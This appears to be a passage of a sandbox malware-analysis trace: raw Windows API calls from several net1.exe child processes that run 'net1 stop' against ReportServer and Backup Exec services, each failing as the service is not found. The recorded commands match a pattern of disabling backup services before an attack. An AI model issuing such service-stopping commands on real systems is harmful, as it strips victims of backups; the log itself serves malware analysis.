[0119.886] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f68c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f68c, lpOverlapped=0x0) returned 0 [0119.886] LocalFree (hMem=0x226178) returned 0x0 [0119.886] _ultow (in: _Dest=0x889, _Radix=1504956 | out: _Dest=0x889) returned="2185" [0119.886] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.887] GetFileType (hFile=0x0) returned 0x0 [0119.887] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x226178 [0119.887] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x226178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0119.887] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f698, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f698, lpOverlapped=0x0) returned 0 [0119.887] LocalFree (hMem=0x226178) returned 0x0 [0119.887] GetFileType (hFile=0x0) returned 0x0 [0119.887] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226178 [0119.887] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0119.887] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f698, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f698, lpOverlapped=0x0) returned 0 [0119.887] LocalFree (hMem=0x226178) returned 0x0 [0119.887] NetApiBufferFree (Buffer=0x221ae8) returned 0x0 [0119.888] NetApiBufferFree (Buffer=0x221b00) returned 0x0 [0119.888] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer /y" [0119.888] exit (_Code=2) Process: id = "240" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fa97000" os_pid = "0x270" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "92" os_parent_pid = "0xf88" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 634 os_tid = 0xe0c [0120.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa0c | out: lpSystemTimeAsFileTime=0x16fa0c*(dwLowDateTime=0x1b62c810, dwHighDateTime=0x1d6f0d1)) [0120.203] GetCurrentProcessId () returned 0x270 [0120.203] GetCurrentThreadId () returned 0xe0c [0120.203] GetTickCount () returned 0x1151536 [0120.203] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa04 | out: lpPerformanceCount=0x16fa04*=23930403264) returned 1 [0120.203] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.203] __set_app_type (_Type=0x1) [0120.203] __p__fmode () returned 0x770331f4 [0120.204] __p__commode () returned 0x770331fc [0120.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.204] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.204] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.204] GetConsoleOutputCP () returned 0x1b5 [0120.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.207] sprintf_s (in: _DstBuf=0x16f9c4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.208] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.210] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.210] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0120.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f790, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.210] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8a) returned 0x284ad8 [0120.210] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.210] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f994 | out: Buffer=0x16f994*=0x281b10) returned 0x0 [0120.210] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f994 | out: Buffer=0x16f994*=0x281b28) returned 0x0 [0120.210] _fileno (_File=0x77032900) returned -2 [0120.210] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.210] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.210] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.210] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.210] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.211] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.211] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.211] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.211] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.211] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.211] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.211] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.211] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.211] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.211] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.211] _wcsicmp (_String1="accounts", _String2="BackupExecManagementService") returned -1 [0120.211] _wcsicmp (_String1="computer", _String2="BackupExecManagementService") returned 1 [0120.211] _wcsicmp (_String1="config", _String2="BackupExecManagementService") returned 1 [0120.211] _wcsicmp (_String1="continue", _String2="BackupExecManagementService") returned 1 [0120.211] _wcsicmp (_String1="cont", _String2="BackupExecManagementService") returned 1 [0120.211] _wcsicmp (_String1="file", _String2="BackupExecManagementService") returned 4 [0120.211] _wcsicmp (_String1="files", _String2="BackupExecManagementService") returned 4 [0120.211] _wcsicmp (_String1="group", _String2="BackupExecManagementService") returned 5 [0120.211] _wcsicmp (_String1="groups", _String2="BackupExecManagementService") returned 5 [0120.211] _wcsicmp (_String1="help", _String2="BackupExecManagementService") returned 6 [0120.211] _wcsicmp (_String1="helpmsg", _String2="BackupExecManagementService") returned 6 [0120.211] _wcsicmp (_String1="localgroup", _String2="BackupExecManagementService") returned 10 [0120.211] _wcsicmp (_String1="pause", _String2="BackupExecManagementService") returned 14 [0120.211] _wcsicmp (_String1="session", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="sessions", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="sess", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="share", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="start", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="stats", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="statistics", _String2="BackupExecManagementService") returned 17 [0120.211] _wcsicmp (_String1="stop", _String2="BackupExecManagementService") returned 17 [0120.212] _wcsicmp (_String1="time", _String2="BackupExecManagementService") returned 18 [0120.212] _wcsicmp (_String1="user", _String2="BackupExecManagementService") returned 19 [0120.212] _wcsicmp (_String1="users", _String2="BackupExecManagementService") returned 19 [0120.212] _wcsicmp (_String1="msg", _String2="BackupExecManagementService") returned 11 [0120.212] _wcsicmp (_String1="messenger", _String2="BackupExecManagementService") returned 11 [0120.212] _wcsicmp (_String1="receiver", _String2="BackupExecManagementService") returned 16 [0120.212] _wcsicmp (_String1="rcv", _String2="BackupExecManagementService") returned 16 [0120.212] _wcsicmp (_String1="netpopup", _String2="BackupExecManagementService") returned 12 [0120.212] _wcsicmp (_String1="redirector", _String2="BackupExecManagementService") returned 16 [0120.212] _wcsicmp (_String1="redir", _String2="BackupExecManagementService") returned 16 [0120.212] _wcsicmp (_String1="rdr", _String2="BackupExecManagementService") returned 16 [0120.212] _wcsicmp (_String1="workstation", _String2="BackupExecManagementService") returned 21 [0120.212] _wcsicmp (_String1="work", _String2="BackupExecManagementService") returned 21 [0120.212] _wcsicmp (_String1="wksta", _String2="BackupExecManagementService") returned 21 [0120.212] _wcsicmp (_String1="prdr", _String2="BackupExecManagementService") returned 14 [0120.212] _wcsicmp (_String1="devrdr", _String2="BackupExecManagementService") returned 2 [0120.212] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecManagementService") returned 10 [0120.212] _wcsicmp (_String1="server", _String2="BackupExecManagementService") returned 17 [0120.212] _wcsicmp (_String1="svr", _String2="BackupExecManagementService") returned 17 [0120.212] _wcsicmp (_String1="srv", _String2="BackupExecManagementService") returned 17 [0120.212] _wcsicmp (_String1="lanmanserver", _String2="BackupExecManagementService") returned 10 [0120.212] _wcsicmp (_String1="alerter", _String2="BackupExecManagementService") returned -1 [0120.212] _wcsicmp (_String1="netlogon", _String2="BackupExecManagementService") returned 12 [0120.212] _wcsupr (in: _String="BackupExecManagementService" | out: _String="BACKUPEXECMANAGEMENTSERVICE") returned="BACKUPEXECMANAGEMENTSERVICE" [0120.212] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2854c8 [0120.832] GetServiceKeyNameW (in: hSCManager=0x2854c8, lpDisplayName="BACKUPEXECMANAGEMENTSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x16f930 | out: lpServiceName="", lpcchBuffer=0x16f930) returned 0 [0120.833] _wcsicmp (_String1="msg", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0120.833] _wcsicmp (_String1="messenger", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0120.833] _wcsicmp (_String1="receiver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0120.833] _wcsicmp (_String1="rcv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0120.833] _wcsicmp (_String1="redirector", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0120.833] _wcsicmp (_String1="redir", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0120.833] _wcsicmp (_String1="rdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0120.833] _wcsicmp (_String1="workstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0120.833] _wcsicmp (_String1="work", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0120.833] _wcsicmp (_String1="wksta", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0120.833] _wcsicmp (_String1="prdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 14 [0120.833] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 2 [0120.833] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0120.833] _wcsicmp (_String1="server", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0120.833] _wcsicmp (_String1="svr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0120.833] _wcsicmp (_String1="srv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0120.833] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0120.833] _wcsicmp (_String1="alerter", _String2="BACKUPEXECMANAGEMENTSERVICE") returned -1 [0120.833] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 12 [0120.833] NetServiceControl (in: servername=0x0, service="BACKUPEXECMANAGEMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x16f92c | out: bufptr=0x16f92c) returned 0x889 [0120.835] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.835] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.836] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.837] GetFileType (hFile=0x0) returned 0x0 [0120.837] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x283b48 [0120.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x283b48, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.837] WriteFile (in: hFile=0x0, lpBuffer=0x283b48, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f86c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f86c, lpOverlapped=0x0) returned 0 [0120.837] LocalFree (hMem=0x283b48) returned 0x0 [0120.837] GetFileType (hFile=0x0) returned 0x0 [0120.837] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x286180 [0120.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x286180, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n(", lpUsedDefaultChar=0x0) returned 2 [0120.837] WriteFile (in: hFile=0x0, lpBuffer=0x286180, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f86c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f86c, lpOverlapped=0x0) returned 0 [0120.837] LocalFree (hMem=0x286180) returned 0x0 [0120.837] _ultow (in: _Dest=0x889, _Radix=1505436 | out: _Dest=0x889) returned="2185" [0120.837] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.838] GetFileType (hFile=0x0) returned 0x0 [0120.838] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x286180 [0120.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x286180, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.838] WriteFile (in: hFile=0x0, lpBuffer=0x286180, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f878, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f878, lpOverlapped=0x0) returned 0 [0120.838] LocalFree (hMem=0x286180) returned 0x0 [0120.838] GetFileType (hFile=0x0) returned 0x0 [0120.838] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x286180 [0120.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x286180, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n(", lpUsedDefaultChar=0x0) returned 2 [0120.838] WriteFile (in: hFile=0x0, lpBuffer=0x286180, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f878, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f878, lpOverlapped=0x0) returned 0 [0120.838] LocalFree (hMem=0x286180) returned 0x0 [0120.838] NetApiBufferFree (Buffer=0x281b10) returned 0x0 [0120.838] NetApiBufferFree (Buffer=0x281b28) returned 0x0 [0120.838] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0120.838] exit (_Code=2) Process: id = "241" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5e069000" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0xf98" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 635 os_tid = 0x1238 [0120.241] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f7dc | out: lpSystemTimeAsFileTime=0x27f7dc*(dwLowDateTime=0x1b678ad0, dwHighDateTime=0x1d6f0d1)) [0120.241] GetCurrentProcessId () returned 0xe00 [0120.241] GetCurrentThreadId () returned 0x1238 [0120.241] GetTickCount () returned 0x1151555 [0120.241] QueryPerformanceCounter (in: lpPerformanceCount=0x27f7d4 | out: lpPerformanceCount=0x27f7d4*=23934174932) returned 1 [0120.241] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.241] __set_app_type (_Type=0x1) [0120.241] __p__fmode () returned 0x770331f4 [0120.241] __p__commode () returned 0x770331fc [0120.241] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.242] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.242] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.242] GetConsoleOutputCP () returned 0x1b5 [0120.242] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.242] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.246] sprintf_s (in: _DstBuf=0x27f794, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.246] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.248] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.248] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0120.248] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f560, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.248] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x88) returned 0x764ad8 [0120.248] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.248] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27f764 | out: Buffer=0x27f764*=0x761b10) returned 0x0 [0120.248] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27f764 | out: Buffer=0x27f764*=0x761b28) returned 0x0 [0120.248] _fileno (_File=0x77032900) returned -2 [0120.248] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.248] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.248] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.248] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.248] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.248] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.248] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.249] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.249] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.249] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.249] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.249] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.249] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.249] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.249] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.249] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.249] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.249] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.249] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.249] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.249] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.249] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.249] _wcsicmp (_String1="accounts", _String2="BackupExecAgentAccelerator") returned -1 [0120.249] _wcsicmp (_String1="computer", _String2="BackupExecAgentAccelerator") returned 1 [0120.249] _wcsicmp (_String1="config", _String2="BackupExecAgentAccelerator") returned 1 [0120.249] _wcsicmp (_String1="continue", _String2="BackupExecAgentAccelerator") returned 1 [0120.249] _wcsicmp (_String1="cont", _String2="BackupExecAgentAccelerator") returned 1 [0120.249] _wcsicmp (_String1="file", _String2="BackupExecAgentAccelerator") returned 4 [0120.249] _wcsicmp (_String1="files", _String2="BackupExecAgentAccelerator") returned 4 [0120.249] _wcsicmp (_String1="group", _String2="BackupExecAgentAccelerator") returned 5 [0120.249] _wcsicmp (_String1="groups", _String2="BackupExecAgentAccelerator") returned 5 [0120.249] _wcsicmp (_String1="help", _String2="BackupExecAgentAccelerator") returned 6 [0120.249] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentAccelerator") returned 6 [0120.249] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentAccelerator") returned 10 [0120.249] _wcsicmp (_String1="pause", _String2="BackupExecAgentAccelerator") returned 14 [0120.249] _wcsicmp (_String1="session", _String2="BackupExecAgentAccelerator") returned 17 [0120.249] _wcsicmp (_String1="sessions", _String2="BackupExecAgentAccelerator") returned 17 [0120.249] _wcsicmp (_String1="sess", _String2="BackupExecAgentAccelerator") returned 17 [0120.249] _wcsicmp (_String1="share", _String2="BackupExecAgentAccelerator") returned 17 [0120.249] _wcsicmp (_String1="start", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="stats", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="statistics", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="stop", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="time", _String2="BackupExecAgentAccelerator") returned 18 [0120.250] _wcsicmp (_String1="user", _String2="BackupExecAgentAccelerator") returned 19 [0120.250] _wcsicmp (_String1="users", _String2="BackupExecAgentAccelerator") returned 19 [0120.250] _wcsicmp (_String1="msg", _String2="BackupExecAgentAccelerator") returned 11 [0120.250] _wcsicmp (_String1="messenger", _String2="BackupExecAgentAccelerator") returned 11 [0120.250] _wcsicmp (_String1="receiver", _String2="BackupExecAgentAccelerator") returned 16 [0120.250] _wcsicmp (_String1="rcv", _String2="BackupExecAgentAccelerator") returned 16 [0120.250] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentAccelerator") returned 12 [0120.250] _wcsicmp (_String1="redirector", _String2="BackupExecAgentAccelerator") returned 16 [0120.250] _wcsicmp (_String1="redir", _String2="BackupExecAgentAccelerator") returned 16 [0120.250] _wcsicmp (_String1="rdr", _String2="BackupExecAgentAccelerator") returned 16 [0120.250] _wcsicmp (_String1="workstation", _String2="BackupExecAgentAccelerator") returned 21 [0120.250] _wcsicmp (_String1="work", _String2="BackupExecAgentAccelerator") returned 21 [0120.250] _wcsicmp (_String1="wksta", _String2="BackupExecAgentAccelerator") returned 21 [0120.250] _wcsicmp (_String1="prdr", _String2="BackupExecAgentAccelerator") returned 14 [0120.250] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentAccelerator") returned 2 [0120.250] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentAccelerator") returned 10 [0120.250] _wcsicmp (_String1="server", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="svr", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="srv", _String2="BackupExecAgentAccelerator") returned 17 [0120.250] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentAccelerator") returned 10 [0120.250] _wcsicmp (_String1="alerter", _String2="BackupExecAgentAccelerator") returned -1 [0120.250] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentAccelerator") returned 12 [0120.250] _wcsupr (in: _String="BackupExecAgentAccelerator" | out: _String="BACKUPEXECAGENTACCELERATOR") returned="BACKUPEXECAGENTACCELERATOR" [0120.251] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7654c0 [0120.846] GetServiceKeyNameW (in: hSCManager=0x7654c0, lpDisplayName="BACKUPEXECAGENTACCELERATOR", lpServiceName=0x39aaf0, lpcchBuffer=0x27f700 | out: lpServiceName="", lpcchBuffer=0x27f700) returned 0 [0120.846] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0120.846] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0120.846] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0120.846] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0120.846] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0120.846] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0120.847] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0120.847] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0120.847] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0120.847] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0120.847] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 14 [0120.847] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 2 [0120.847] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0120.847] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0120.847] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0120.847] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0120.847] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0120.847] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTACCELERATOR") returned -1 [0120.847] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTACCELERATOR") returned 12 [0120.847] NetServiceControl (in: servername=0x0, service="BACKUPEXECAGENTACCELERATOR", opcode=0x0, arg=0x0, bufptr=0x27f6fc | out: bufptr=0x27f6fc) returned 0x889 [0120.848] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.848] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 